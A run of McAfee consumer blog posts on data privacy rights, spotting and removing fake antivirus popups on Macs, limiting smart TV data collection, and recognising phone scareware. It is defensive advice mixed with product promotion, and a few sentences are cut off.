    Sensitive personal data represents the most valuable and vulnerable information about you—the details that, if compromised, could cause significant harm to your finances, safety, and peace of mind. Unlike basic contact information, sensitive data requires stronger legal protections and your extra vigilance because of its potential for misuse.

    Health Information

    Your health information deserves particular care because it reveals intimate details about your physical and mental well-being. HIPAA protections cover medical records, but health data collected by fitness apps, mental health platforms, or wellness websites may not receive the same legal safeguards.

    Biometric data

    Biometric data—your unique physical characteristics such as fingerprints, voice patterns, or facial features—can’t be changed if stolen, making this information particularly precious.

    Children’s Information

    Children’s data receives special attention under privacy laws because minors can’t meaningfully consent to data collection. The Children’s Online Privacy Protection Act requires explicit parental consent before companies can collect information from children under 13, while some state laws extend these protections to older teens.

    GDPR for the global services

    Meanwhile, global services such as Google, Facebook, or Netflix apply the Europe-established General Data Protection Regulation (GDPR) laws worldwide to maintain consistent data practices.

    GDPR personal data includes obvious identifiers such as your name, email address, phone number, and Social Security number. But it also covers less obvious information, such as IP addresses, device IDs, location data, and even your online shopping habits or social media activity. Essentially, if data points can be combined to create a profile of you, they qualify as personal data under GDPR standards. This broader definition gives you stronger control over your information and has influenced many U.S. companies to offer the same rights to all users, not just those in the European Union.

    Whether a company follows GDPR, California’s privacy laws, or other frameworks, the core principle remains the same: you deserve transparency and control over your personal information.

    How can you celebrate Data Privacy Day?

    Your privacy rights are expanding, but exercising them effectively requires staying informed and taking proactive steps. As we celebrate Data Privacy Day, we recommend you participate by taking simple, practical steps to exercise your data privacy rights.

    Review your privacy settings regularly

    Start with the platforms and services you use most frequently. Look for the privacy or data protection section in your account settings and review the information being collected and shared.

    Submit data access requests

    Many major companies now provide online forms or dedicated email addresses for privacy requests. Take advantage of these to understand what data they have about you. Popular platforms such as Google, Facebook, and Amazon have streamlined processes for data downloads.

    Opt out of data sales

    Look for “Do Not Sell My Personal Information” links on websites, typically found in footers or privacy policy pages. You can also use opt-out tools such as the Global Privacy Control browser setting that automatically signals your opt-out preferences.

    Use data broker opt-out services

    Many data brokers now offer opt-out mechanisms, though the process can be time-consuming. Consider using privacy services that handle multiple opt-out requests on your behalf.

    Monitor your digital footprint

    Regularly search for your name and personal information online. Set up Google Alerts for your name and key personal details to stay informed about new appearances of your information. In addition, monitor your credit reports for unauthorized changes, and use identity monitoring services that watch for your personal information appearing in data breaches or on the dark web.

    Use reputable websites and tools

    When sharing sensitive information online, verify that websites use https:// in the address bar and read privacy policies before providing personal details. Only use well-established, privacy-focused health, financial, and communication platforms with a strong track record of privacy and data protection.

    Oversee your kids’ online activities

    For children’s data, maintaining active oversight will help you stay ahead of potential problems in their online activities. Review the apps and websites they use, understand what information these platforms collect, and use parental controls to limit data sharing. Teach your children about privacy and the risks of sharing personal information online.

    Everyday tips to maintain your privacy

    Protecting your personal data doesn’t have to feel like a giant, technical project. Most privacy wins come from small, repeatable habits that you can do in minutes to shrink your digital footprint, and use the internet on your terms.

    • Limit what you share online: Review your social media privacy settings and share only what’s necessary to reduce your exposure to identity thieves and the potential for your data to be used against you.
    • Review your location permissions: For location data, regularly review and delete location history from your devices and disable location sharing for apps that don’t need it.
    • Crumble that cookie: You can turn cookies off in your browser settings. This step may prevent you from using certain websites, but it is a step toward privacy.
    • Stay private while browsing: Use a virtual private network from a reputable, reliable company to keep your online activities private, especially when using unsecured Wi-Fi in public places such as cafes, airports, and libraries.

    Your personal information has value, so make sure you’re getting a fair return through services that respect your privacy.

    FAQs about data privacy

    What counts as personal data?

    Personal data includes any information that can directly or indirectly identify you. This covers obvious details such as your name, email, and Social Security number, but also extends to IP addresses, device identifiers, location data, browsing history, and even inferences about your preferences or behavior.

    How can I opt out of data sale and sharing?

    On company websites, look for “Do Not Sell My Personal Information” or “Your Privacy Choices” links, usually found in the footer. You can also use the Global Privacy Control browser signal to send opt-out requests automatically. Services such as DeleteMe or manual removal requests can help you reclaim control of your information from data brokers and multiple platforms.

    What should I do after a data breach?

    First, change passwords for affected accounts and enable two-factor authentication. Next, monitor your credit reports and bank statements for unusual activity. If Social Security numbers or financial data were involved, place a credit freeze with all three major credit bureaus. Sign up for identity monitoring services if offered by the breached company. Be sure to document everything and report identity theft to the FTC if you notice fraudulent activity.

    How do I spot dark consent patterns?

    Watch for manipulative design tricks that push you toward sharing more data. Red flags include pre-checked boxes for marketing emails, making privacy-friendly options harder to find or understand, using confusing language that hides the intent, or making it much easier to accept all cookies than to customize your preferences. Legitimate consent should be freely given, specific, informed, and easily withdrawn.

    What rights do I have over my personal data?

    Depending on your location, you may have the right to know what data companies collect about you, request copies of your data, correct inaccurate information, delete your data, and opt out of its sale or use for targeted advertising. Some laws also give you the right to data portability and protect you from discrimination for exercising these rights. Check if your state has comprehensive privacy laws or if you’re covered by GDPR.

    What essential resources can I read to stay informed?

    To stay current with your privacy rights and the evolving legal landscape, bookmark these authoritative resources:

    Final thoughts

    Data Privacy Day serves as an important annual reminder, but your commitment to privacy and data protection shouldn’t end when January 28th passes. The digital threats we face continue to evolve throughout the year, making ongoing vigilance essential to protect your personal details.

    Small, consistent habits can make a profound difference in your digital security. By regularly updating your passwords, enabling multi-factor authentication, reviewing privacy settings on your accounts, and staying informed about emerging threats, you create layers of protection that work together to safeguard your information.

    Invest in McAfee+ identity protection, which includes proactive identity surveillance to monitor subscribers’ credit and personal information, as well as access to live fraud resolution agents who help subscribers work through the process of resolving identity theft issues.

    The post Celebrate Data Privacy Day by Applying These Best Practices appeared first on McAfee Blog.

    Stop Fake Antivirus Popups on Your Mac

    By: McAfee
    antivirus app on laptop

    Mac users often say, “I don’t have to worry about viruses. I have a Mac!” But that sense of safety is outdated. Macs face real threats today, including scareware and fake antivirus pop‑ups designed specifically for macOS. One of the most infamous examples is the Mac Defender family, which appeared around 2011 under names like “Mac Defender,” “Mac Security,” and “Mac Protector,” luring users with fake security alerts and then installing malicious software.

    These scams have long targeted Windows PCs and later expanded to Macs, using similar tactics: bogus scan results, alarming pop-ups, and fake security sites that push users to download “protection” software or pay to remove nonexistent threats. Once installed, these programs can bombard you with persistent warnings, redirect you to unwanted or explicit sites, and may even try to capture your credit card details or other sensitive information under the guise of an urgent upgrade.

    In this blog, we’ll take a closer look at how you become a target for these fake antivirus pop‑up ads, how to remove them from your Mac, and practical steps you can take to block them going forward.

    What is fake antivirus software?

    Fake antivirus software is malicious software that tricks you into believing your Mac is infected with viruses or security threats when, in fact, it isn’t. These deceptive programs, also known as rogue antivirus or scareware, masquerade as legitimate security tools to manipulate you into taking actions that benefit cybercriminals.

    On your Mac, fake antivirus pop-up ads typically appear as urgent browser warnings or system alerts claiming to have detected multiple threats on your computer. These fraudulent notifications often use official-looking logos, technical language, and alarming messages like “Your Mac is infected with 5 viruses” or “Immediate action required” to create a sense of urgency and panic.

    These scams manipulate you by:

    • Requesting payment: They’ll prompt you to purchase their “premium” software to remove the fake threats, often charging $50-200 for worthless programs.
    • Providing fake phone numbers: The pop-up ads will display fake support numbers you can call for “immediate technical assistance.”
    • Requesting personal information: Once you call the number, the scammer on the other end of the line will request your credit card details, personal information, or remote access to your computer.
    • Encouraging malicious downloads: The ads will trick you into downloading actual malware disguised as security software.

    Tactics scammers use to infect your device with fake antivirus pop-up ads

    Fake antivirus popups are almost always the result of a sneaky delivery method designed to catch you off guard. Scammers rely on ads, compromised websites, misleading downloads, and social engineering tricks to get their scareware onto your Mac without you realizing what’s happening. Let’s take a look at the common ways these scams spread so you can avoid them.

    • Deceptive online advertisements: Fake antivirus software often appears through misleading ads that claim your Mac is infected or at risk. These ads can appear on legitimate websites and use urgent language, such as “Your Mac has 3 viruses!” to create a sense of panic.
    • Malvertising campaigns: Cybercriminals purchase legitimate advertising space and inject malicious code that automatically redirects you to fake antivirus download pages. This can happen even on reputable websites you trust.
    • Drive-by downloads: Simply visiting a compromised website can trigger automatic downloads of fake antivirus software without your knowledge. Your Mac may store these files in your Downloads folder, where they wait for you to accidentally open them.
    • Bundled software installers: Fake antivirus programs often hide in free applications from unofficial sources. During installation, you might unknowingly agree to install additional “security” software that’s actually malicious.
    • Pirated applications and media: Illegal downloads of software, movies, or music frequently contain fake antivirus programs as hidden payloads. These files install malware alongside the content you wanted.
    • Typosquatted domains: Scammers register URLs that are slightly altered or are misspellings of legitimate websites, such as Apple-support.com. These typosquatted links are sent via phishing emails that claim to have detected a virus on your Mac. If you click on the fake link, you could be infected with malware that displays alarming security warnings and promotes fake antivirus downloads.
    • Fake technical support pages: Scammers create convincing replicas of Apple Support or legitimate security company websites that promote fake antivirus solutions. These pages often include official-looking logos and professional language to appear trustworthy.
    • Browser notification abuse: Some websites request permission to send you notifications, then later spam you with fake virus alerts. Clicking on these notifications could download fake antivirus software that mimics macOS system alerts.
    • Malicious configuration profiles: Fake antivirus installers may request permission to download configuration profiles onto your device, granting them deep access to your Mac’s settings and network traffic. Once installed, these profiles will redirect your browser traffic through malicious servers and display fake security warnings.

    Elements of a fake virus alert

    Fake virus alerts use a mix of visual tricks and psychological pressure to push you into clicking, calling, or paying before you have time to think. This section breaks down the common elements scammers use in these alerts so you can recognize a fake warning instantly and ignore it.

    • Blaring alarm and full-screen browser takeover: If your browser suddenly goes full-screen with flashing red warnings and audio alarms, you’re looking at a scam designed to panic you into taking immediate action. Real Mac security notifications never lock your entire screen or play loud, startling sounds. Legitimate macOS alerts appear as small, quiet dialogs in the upper-right corner of your screen.
    • Urgent countdown timers: The high-pressure countdown clocks claiming your Mac will be “permanently damaged” in minutes are artificial psychological tactics that scammers use to pressure and prevent you from thinking clearly. Apple’s real security notifications give you time to review and respond thoughtfully
    • Spelling and grammar mistakes: Fake alerts often contain telltale errors such as “Your computer has been infected” or “Immediate action required.” Apple invests heavily in polished, professional communications to produce macOS security dialogs with error-free language that reflects the company’s attention to detail.
    • Requests for gift cards or cryptocurrency payments: Any request for unconventional payment methods is an immediate indicator of a scam. Apple will never ask you to purchase iTunes gift cards, Amazon cards, or Bitcoin to “clean” your Mac. Authentic Apple security software uses traditional payment methods through official app stores or verified websites.
    • Suspicious phone numbers for “tech support”: Scammers use phone numbers that connect you directly with fraudsters who will remotely access your Mac or extract personal information. Legitimate macOS alerts don’t include phone numbers to call for immediate help. Apple provides support through official channels, which are clearly marked on their website.
    • Generic or mismatched company logos: Fake alerts often use distorted Apple logos, outdated designs, or generic “security shield” graphics instead of authentic branding. Real macOS notifications maintain consistent visual elements that match your system’s appearance and Apple’s official style guidelines.
    • Misleading URLs: Scam pages often use suspicious addresses such as “apple-security-center.net” or “mac-virus-removal.com.” Authentic security alerts from macOS appear in System Settings or from apps you’ve knowingly installed from the official Apple App Store.
    • Persistent pop-up ads that won’t close: Fake virus warnings often spawn multiple windows, reappear after being closed, or make it difficult to exit. Authentic macOS security features respect your control and don’t bombard you with alerts.
    • Warnings that bypass System Settings: Fake alerts typically appear only as web pages or unauthorized pop-ups that don’t connect to your actual system security settings. Genuine Mac security notifications integrate with your system properly, appearing through official macOS notification systems or System Settings under Privacy & Security.
    • Claims “hundreds of viruses found” without scanning: Fake alerts instantly claim to have found dozens or hundreds of viruses without performing a legitimate scan. Real security scans, however, take time to complete and provide specific, verifiable results about actual threats.

    Examples of fake antivirus software and pop-ups

    • Mac “Defender” variants: This notorious family of fake antivirus programs includes variants such as Mac Security, Mac Protector, and Mac Guard, appearing through deceptive search results or malicious websites. They display fake system scans that allegedly found threats on your Mac to trick you into paying $50-$99 for a useless antivirus tool. Once you enter payment information, cybercriminals will access your financial data and may continue charging your card for bogus services.
    • Generic “antivirus” popups: These fake alerts have generic names such as Antivirus 10, Mac Antivirus Pro, or Advanced Mac Cleaner. These ads pop up while you browse, often accompanied by loud alarms and urgent countdown timers, claiming your Mac is infected and demanding immediate action. The scam journey involves clicking the alert, downloading malicious software disguised as security tools, and potentially compromising both your system and personal information.

    Verify that an antivirus alert is fake

    If you’re not sure whether an antivirus warning is real or just scareware, a quick verification is the safest next step. There are steps you can take and settings on your macOS you can check without putting your Mac at further risk.

    1. Disconnect from the internet immediately: When you suspect a fake antivirus alert, the first step is to break the connection between your Mac and the internet to stop malicious processes from communicating with remote servers or downloading additional threats.
    2. Check the URL and certificate details: If the alert appeared in your web browser, examine the web address carefully. Legitimate security warnings from Apple or trusted vendors will come from official domains, not URLs with misspellings or random characters.
    3. Verify the app’s developer signature and source: To verify that the developer signatures are from recognized companies, open Finder, navigate to Applications, and locate the security software. Right-click the application and select “Get Info” to view the developer information. In macOS Ventura, Sonoma, and Sequoia, you can also go to Apple Menu > About This Mac > More Info > System Report > Applications to view information about the software.
    4. Review configuration profiles and login items: Navigate to Apple Menu > System Settings or System Preferences > Privacy & Security to find and remove any configuration profiles you didn’t install. Next, check Login Items & Extensions or Users & Groups > Login Items for suspicious applications set to launch automatically.
    5. Inspect LaunchAgents and LaunchDaemons folders: Fake antivirus software often installs persistent components in these system folders. Go to Finder > Go to Folder > ~/Library/LaunchAgents, /Library/LaunchAgents, and /Library/LaunchDaemons. Fake antivirus files typically have .plist extensions.
    6. Check browser extensions and notification permissions: Fake antivirus alerts often originate from malicious browser extensions or abusive notification permissions. Review your extensions and remove those you didn’t install or revoke permissions that might be generating fake security alerts.
    7. Run legitimate security scans from trusted sources: Use reputable security tools downloaded only from the Apple App Store or directly from the websites of legitimate vendors to scan your system. Apple’s built-in XProtect and Malware Removal Tool (MRT) run automatically, but you can also use the system’s First Aid feature in Disk Utility to check for file system issues.

    Your action plan when a fake virus warning pops up

    The moment a fake virus warning pops up, scammers are hoping you’ll react fast, click a button, call a number, or download their “fix.” However, the safest approach is the opposite: take a moment to think, don’t interact with the alert, close the browser, and clear any files it may have tried to leave behind. Here’s exactly what to do right away to stay safe.

    1. Stay calm and don’t interact with the alert: Resist the urge to click anywhere on the fake virus warning pop-up window, including any “X” buttons, “OK” buttons, or phone numbers. These elements are designed to trick you into downloading malware or connecting with scammers. Avoid touching your mouse or trackpad while the alert is displayed.
    2. Force-quit your browser immediately. Press Command + Option + Esc to open the Force Quit Applications window, select your browser (Safari, Chrome, Firefox, or Edge), and click “Force Quit.” If the pop-up has taken over your entire screen, try pressing Command+Q to quit the browser directly. This breaks the connection to the malicious website without triggering any hidden downloads.
    3. Clear your browser’s site data and disable notifications. When you restart your browser, immediately go to Preferences/Settings and clear your browsing data, cookies, and cache. Then navigate to the Notifications section and remove permissions for suspicious websites to block the fake antivirus from returning.
    4. Check and remove any malicious configuration profiles. Go to System Settings > Privacy & Security > Profiles or System Preferences > Profiles, and look for profiles you didn’t install, especially those with generic names or suspicious publishers. Select unknown profiles and click the minus (-) button to remove them.
    5. Restart your Mac to clear temporary threats: A simple reboot helps clear any temporary malicious processes that might be running in memory. After restarting, check your desktop and Downloads folder, move unfamiliar files to the Trash, and empty it completely.
    6. Update your macOS and browser to the latest versions: Go to System Settings > General > Software Update and install macOS updates. Update your browsers as well to protect against the latest fake antivirus tactics and browser exploits.
    7. Run a full security scan with trusted software: Use reputable security software to scan your entire system for lingering threats. Focus on applications that have been specifically designed for Mac and have current threat definitions.
    8. Monitor and validate financial statements: If you provided payment information to what you now suspect was fake antivirus software, immediately check your bank and credit card statements for unauthorized charges. Report these fraudulent charges to your financial institutions and place fraud alerts on your accounts over the next few weeks.
    9. Report the scam to protect others: Report the fake antivirus website to the Federal Trade Commission and to Google’s Safe Browsing if you encountered it through search results. You can also report it to your browser manufacturer. Your report helps security teams identify and block these threats more quickly, thereby protecting other Mac users from falling victim to the same scam.

    Final thoughts

    Your Mac experience should be enjoyable and secure. With the right awareness and tools, it absolutely can be, especially when you know what to look for and follow the right practices. By recognizing the warning signs of fake antivirus pop-ups, downloading software only from trusted sources, keeping your macOS and applications updated, and following the prevention tips outlined above, you can avoid falling victim to these fake antivirus scams.

    Remember that legitimate security alerts from Apple come through System Preferences and official macOS notifications, not through alarming browser pop-ups demanding immediate payment or phone calls. Use reputable security tools from a trusted vendor, such as McAfee, that provides real-time protection and regular updates about emerging threats.

    Share these tips with your family and friends, especially those who might be less tech-savvy and more vulnerable to these deceptive tactics. The more people understand how fake antivirus schemes operate, the safer our entire digital community is.

    The post Stop Fake Antivirus Popups on Your Mac appeared first on McAfee Blog.

    How To Tell If Your Smart TV Spying on You

    By: McAfee

    From their original design as simple broadcast receivers, today’s televisions have evolved into powerful, internet-connected entertainment hubs. Combining traditional viewing with online capabilities, smart TVs provide instant access to streaming platforms, web browsing, voice assistants, and personalized recommendations. 

    As our TVs have grown smarter, however, they’ve also become gateways to new privacy and security challenges. In a chilling echo of George Orwell’s dystopian novel 1984, it’s possible that Big Brother, or in this case, Big Hacker, might be surveilling you through your own television.

    In 2013, evidence emerged that smart TVs can be just as vulnerable to hacking as home computers, following an investigation by security analysts Aaron Grattafiori and Josh Yavor at iSEC Partners. Working with smart TV manufacturers to address potential vulnerabilities, the analysts presented their findings at the Black Hat network security conference in Las Vegas. Their demonstration highlighted the concerning possibility of smart TVs not only physically surveilling you through the built-in camera but also prying deeper into your personal life by collecting data on your web searches, app usage, and preferences.

    Smart TV hacking entry points

    Smart TVs can be hacked in several ways, but the gateway that opens your smart TV to these attacks is the IP address, which links with internet-driven apps such as Facebook and YouTube, as well as video streaming services, microphones, and even internal cameras. Because smart TVs often run the same code as computers and smartphones, such as JavaScript or HTML5, they are also susceptible to malware and spyware attacks. These are some of the ways your device can be hacked:

    • Outdated firmware: When you don’t regularly update your TV’s software, you leave known security holes wide open for cybercriminals to enter. These updates often include security patches, but many users ignore update notifications.
    • Unsecure downloads or sideloads: When you download apps from unofficial sources or use older apps with poor security, you invite malware into your living room. Additionally, weak Wi-Fi settings at home create an opening for hackers to access not just your TV but your entire network.
    • Weak login habits: Using the may include background services you are unaware of, which allow criminals to access your smart TV once they’ve compromised your other accounts. Smart TVs could even have background services you might not know about, creating additional attack points.
    • Compromised physical connections: Infected HDMI devices or USB drives could introduce malware into your system. Once hackers gain access to your smart TV, they can use it to move through your home network and other connected devices.

    Spying beyond physical surveillance

    Once a hacker has compromised your smart TV, they can spy on you through several built-in technologies that collect data on your viewing habits, conversations, and online activities.

    • Automatic Content Recognition (ACR): This is a common spying method that analyzes audio or video snippets from your content. It then packages and sells this data to advertisers, who use it to create profiles of your entertainment preferences for customized advertising. 
    • Voice assistants and listening microphones: Many smart TVs include voice control features that activate when you say specific wake words. These microphones can capture private conversations, even when the TV is “off” and on standby mode. This data could be processed by third-party voice recognition services, creating potential eavesdropping risks.
    • Built-in or plug-in cameras: These enable video calling and gesture control features, but they also create opportunities for unauthorized surveillance and privacy vulnerabilities. Smart TVs with cameras could be accessed by hackers or malicious software.
    • App-level tracking and advertising IDs: Similar to smartphone apps, smart TV apps also collect data on your usage and preferences through unique advertising identifiers, which build comprehensive profiles for targeted marketing. Your Netflix viewing habits might influence ads you see on YouTube or other platforms.
    • Data sharing with third parties: TV manufacturers often share collected data with advertising networks, content providers, and data brokers to create extensive digital profiles. This information can include viewing schedules, app usage, voice recordings, and even household demographic insights.
    • Privacy settings: Most smart TVs offer settings to disable ACR, limit voice recording, and opt out of personalized advertising. Look for “Privacy,” “Viewing Data,” or “Interest-Based Advertising” options in your TV’s settings menu. However, these settings may reset after software updates.
    • Network behaviors: Your smart TV communicates with various servers, sending viewing data, software telemetry, and usage statistics even when you’re not actively using smart features. Router logs often show smart TVs making hundreds of network connections per day to advertising and analytics services.

    The key to managing these privacy risks is understanding what data your TV collects and taking control through privacy settings, network restrictions, and informed usage decisions. 

    Types of data that smart TVs collect

    • Viewing history, content preferences, and navigation patterns: Your smart TV tracks what shows, movies, and channels you watch, how long you view them, and when you pause or skip content. This data helps TV manufacturers and streaming app providers understand your entertainment preferences and suggest personalized content.
    • Device identifiers and technical data: Your TV collects unique device identifiers, IP addresses, Wi-Fi network information, and technical specifications. In turn, manufacturers use this data for device management, software updates, and to link your viewing activity across different sessions and devices.
    • Advertising IDs and marketing data: Smart TVs generate unique advertising identifiers that track your activity for targeted advertising. Third-party advertisers and data brokers use these IDs to build detailed profiles for marketing campaigns and to measure ad effectiveness across different platforms.
    • Voice recordings and search queries: Your voice commands or searches are recorded and processed by the manufacturer’s servers or third-party speech-recognition services to improve voice-recognition accuracy and deliver search results.
    • Geolocation and network information: Your smart TV can determine your approximate location through your IP address and Wi-Fi network details. This geographic data helps content providers offer region-specific programming and advertising.
    • Diagnostic and performance data: Smart TVs collect technical performance metrics, error logs, and usage statistics to help manufacturers and software partners identify issues, improve software performance, and develop new features. 

    Take control of your data

    Your smart TV data typically flows to multiple parties. It starts with the device manufacturer for product improvements, then to streaming app providers for content recommendations, on to advertising networks for targeted marketing, and analytics companies for usage insights. Recent regulatory guidance emphasizes that you should have clear visibility into these data-sharing relationships through your TV’s privacy policy.

    You can limit data collection by disabling Automatic Content Recognition (ACR) in your TV’s privacy settings, turning off personalized advertising, and regularly reviewing app permissions. Consumer protection agencies require smart TV manufacturers to provide opt-out mechanisms for advertising personalization and data sharing with third parties.

    Stop the spying

    Fortunately, you can significantly reduce your smart TV risks with some simple preventive measures:

    1. Check your TV’s privacy and ACR settings: Navigate to your smart TV’s settings menu and look for privacy, data collection, or “Automatic Content Recognition” (ACR) options, and disable or limit that function to prevent the tracking of your viewing behaviors and preferences. 
    2. Review consent prompts after software updates. When you see pop-ups asking for consent to new terms, take a moment to read what you’re agreeing to. You can often decline optional data sharing while keeping essential functionality. 
    3. Monitor your ad personalization settings: Look for advertising or marketing preferences in your settings menu, and opt out of personalized advertising to reduce the data collected about your viewing patterns.
    4. Audit app permissions and microphone access: Smart TV apps may request access to features such as your microphone, camera, or network information. Review which apps have these permissions. Voice assistants and video calling apps may need microphone access, but streaming apps typically don’t require these sensitive permissions.
    5. Monitor network activity: Check your router’s device list to see if your smart TV is unusually chatty with unknown servers. Many modern routers also offer parental controls or privacy features that can limit your TV’s internet access to only essential functions.
    6. Perform security audits on major platforms: Roku, Samsung Tizen, LG webOS, and Android TV each offer basic privacy controls in their main settings. Look for “Privacy,” “Ads,” “Data Collection,” or “Viewing Information” to take control regardless of your TV model.
    7. Check for physical indicators and hardware controls: Many newer smart TV models don’t include cameras, but if yours does, you’ll often find a physical privacy shutter or the ability to disable it in settings. For voice features, look for microphone mute buttons on your remote or TV itself.
    8. Stay updated: Ensure your apps are updated regularly to maintain the security of your TV and its apps. The digital world is full of bugs waiting for a chance to invade your device, so don’t let outdated apps provide them the perfect entry point. 
    9. Use social media sparingly: Social media sites are notorious hunting grounds for identity thieves. Restrict the use of these apps to your computer, smartphone, or tablet, and ensure they have comprehensive security protection to guard your devices, identity, and data.

    Standby versus fully off

    Most smart TVs don’t fully turn off when you press the power button; they enter standby mode to enable quick startup. In this state, certain components may remain active and continue collecting data. It might maintain network connectivity to receive software updates, keep microphones and voice assistants ready to respond to wake words, or continue ACR that tracks your viewing habits.

    To truly disconnect your TV from potential monitoring, you have several options:

    1. Look for a physical mute switch on your remote or TV for the microphone. This provides a hardware-level disconnect that software can’t override.
    2. You can unplug your TV entirely when not in use or connect it to a power strip that you can easily switch off to cut all power.
    3. For a more permanent solution, dive into your TV’s privacy settings to disable ACR tracking, turn off voice activation features, and restrict background data collection. 
    4. You can also disconnect your TV from Wi-Fi entirely if you primarily use external streaming devices, which gives you more control over what data gets shared.

    FAQs about Smart TVs

    Do all smart TVs have cameras?

    It depends on your specific smart TV model and its manufacturing date. Most modern smart TVs manufactured after 2022 do not include built-in cameras. Major manufacturers such as Samsung, LG, Sony, and TCL have largely moved away from integrating cameras directly into their television sets due to privacy concerns and limited consumer adoption. 

    Some premium models and older smart TVs from 2018-2021 may still feature built-in cameras designed typically used for:

    • Video calling: Apps such as Zoom or Google Meet allow you to make calls from your TV
    • Gesture control: Hand movements enable you to navigate menus and control functions 
    • Facial recognition: Based on who is watching, smart TVs can personalize content recommendations
    • Voice assistant integration: Some cameras work with microphones to enhance smart assistant features

    If your smart TV does have a camera, you still have control, as most smart TVs with cameras include physical privacy shutters, software controls to disable the camera, or the option to cover the lens. For external USB cameras, simply unplugging it ensures that no one can see you through the smart TV.

    How do I know if my smart TV has a camera?

    To determine if your smart TV has a camera, check the following:

    1. The physical TV: Check the top, bottom, and side edges of your TV screen for a small circular lens, typically about the size of a coin. Built-in cameras are typically small lenses located on the top bezel or may retract into the frame. 
    2. Quick detection test: In a dimly lit room, shine a flashlight across your TV’s bezel while looking for reflective surfaces. Camera lenses will reflect light differently than the surrounding plastic, appearing as small, glassy circles that catch and reflect the light beam.
    3. Camera shutter or privacy cover: TVs with built-in cameras often include a sliding privacy shutter or removable cover. Look for a small plastic piece that can slide over the camera lens area, or a hinged cover that flips up and down.
    4. User manual: Your manual will clearly list the camera functionality if it is present. You can also find detailed specs on the product packaging. Look for terms such as “built-in camera,” “video calling,” or “gesture control” in the feature list.
    5. Manufacturer’s website: Visit your TV manufacturer’s official support page and enter your exact model number. The detailed product specifications should confirm whether your model includes camera hardware.
    6. Camera-related settings: Go to your smart TV’s main settings menu and look for sections labeled “Camera,” “Privacy,” “Microphone,” or “Gesture Control.” If these options exist, your TV likely has camera capability. Many TV models from 2023 include dedicated privacy toggles that let you fully disable camera functions.

    If you discover your smart TV has a camera, you can take control of your privacy by disabling it in your TV’s settings, covering it with tape when not in use, or using any built-in privacy shutters.

    How can I disable or manage my smart TV camera?

    Aside from the precautions listed above, there are other ways you can disable your smart TV’s camera:

    • Privacy settings: Navigate to your smart TV’s Settings menu, then look for “Privacy,” “Security,” or “Camera” options. Most modern TVs group these controls together to limit the data your device collects and shares.
    • Specific apps: Review which apps have camera permissions by going to Settings > Apps > [App Name] > Permissions. Turn off camera access for apps that don’t need it, like streaming services or games. Video calling apps will need camera access to function properly.
    • Gesture and voice control: Disable motion-sensing and voice-recognition features in your TV’s accessibility or interaction settings, as these features often require the camera and microphone to be active.
    • System update resets: Smart TV updates can sometimes reset your privacy settings to defaults. After each update, take a few minutes to verify your camera and microphone settings remain off as you configured them.
    • Network-level protection: For tech-savvy users, consider setting up router-level controls to monitor or restrict your smart TV’s internet connections. Some routers allow you to block specific domains or limit device communication, adding another layer of control over what data your TV can share.
    • Automatic security updates: Keep your smart TV’s firmware up to date by enabling automatic updates. Manufacturers regularly release security patches that address vulnerabilities to protect you from potential threats.
    • Dedicated guest network: Consider connecting your smart TV to a separate Wi-Fi network from your main devices. This limits potential access to other connected devices in your home if your TV’s security is ever compromised.

    Final thoughts

    If the thought of your living room turning into a hacker’s surveillance paradise sends a chill down your spine, you’re not alone. Fortunately, you can take some protective measures that keep your smart TV safe.

    One of the best ways to protect yourself is to stay informed about the latest developments in smart TV security. Attend webinars, read articles, and follow experts in the field to stay current with the latest security threats and fixes. 

    Just as importantly, small but effective digital habits will also fortify your smart TV security: keep your TV’s firmware updated, stick to official app stores, secure your home Wi-Fi with strong encryption, use unique passwords for your devices, limit the use of social media and messaging apps on your TV, and be cautious about what you plug into your TV’s ports. 

    By following these recommendations, you can continue to relax in your living room and enjoy your digital entertainment experience without compromising your privacy and security.

    The post How To Tell If Your Smart TV Spying on You appeared first on McAfee Blog.

    Black or Scrambled Phone Screen? Here’s How to Spot a Hacked vs Broken Phone

    By: McAfee

    It’s the screen you never want to see.

    Something is seriously wrong with your phone. Or is it? You might not have a broken phone at all. Instead, you might have a hacked phone.

    This is a form of scareware, an attack that frightens you into thinking your device is broken or infected with a virus
    Source: Mobile Hacker

    What you see above is a form of scareware, an attack that frightens you into thinking your device is broken or infected with a virus. What the hacker wants you to do next is panic. They want you to tap on a bogus link that says it’ll run a security check, remove a virus, or otherwise fix your phone before the problem gets worse.

    Of course, tapping that link takes you to a malware or phishing site, where the hacker takes the next step and installs an even nastier form of malware on your phone. In other cases, they steal your personal info under the guise of a virus removal service. (And yes, sometimes they pose as McAfee when they pull that move. In fact,

    Note that in this example above, the hacker behind the phony broken screen is arguably going for a user who’s perhaps less tech savvy. After all, the message atop the “broken” screen appears clear as day. Still, in the heat of the moment, it can be convincing enough.

    How does scareware get on phones?

    Scareware typically finds its way onto phones through misleading ads, fake security alerts, or hacked websites. In other cases, downloading apps from places other than an official app store can lead to scareware (and other forms of malware too).

    As for malware on phones, you’ll find different risk levels between Android and iOS phones. While neither platform is completely immune to threats, Android phones are reportedly more susceptible to viruses than iPhones due to differences in their app downloading policies. On Android phones, you can install apps from third-party sources outside the official Google Play Store, which increases the risk of downloading malicious software.

    In contrast, Apple restricts app installations to its official App Store, making it harder for malware to get on iOS devices. (That’s if you haven’t taken steps to jailbreak your iPhone, which removes the software restrictions imposed by Apple on its iOS operating system. We absolutely don’t recommend jailbreaking because it may void warranties and make it easier for malware, including scareware, to end up on your phone.)

    If you think you’ve wound up with a case of scareware, stay calm. The first thing the hacker wants you to do is panic and click that link. Let’s go over the steps you can take.

    How to remove malware from your Android phone

    If you don’t already have mobile security and antivirus for your phone, your best bet is to get the latest virus removal guidance from Android, which you can find on this help page.

    Moving forward, you can get protection that helps you detect and steer clear of potential threats as you use your phone. You can pick up McAfee Security: Antivirus VPN in the Google Play store, which also includes our Scam Detector and Identity Monitoring. You can also get it as part of your McAfee+

    How to remove malware from your iPhone

    Step 1: Restart your phone

    Hold down the iPhone power button until you see slide to power off on your screen. Slide it, wait for the phone to power down, and then press the power button to restart your iPhone.

    Step 2: Download updates 

    Having the latest version of iOS on your phone ensures you have the best protection in place. Open the Settings app.  Look for Software Update in the General tab. Select Software Update. Tap Download and Install to the latest iPhone update.

    Step 3: Delete suspicious apps 

    Press a suspicious app icon on your screen and wait for the Remove App to pop up. Remove it and repeat that as needed for any other suspicious apps.

    More steps you can take …

    If those steps don’t take care of the issue, there are two stronger steps you can take. The first involves restoring your phone from a backup as described by Apple here.

    The most aggressive step you can take is to reset your phone entirely. You can return it to the original factory settings (with the option to keep your content) by following the steps in this help article from Apple.

    How to avoid malware on your phone

    Clearly these attacks play on fear that one of the most important devices in your life has a problem—your phone.

    1. Protect your phone.

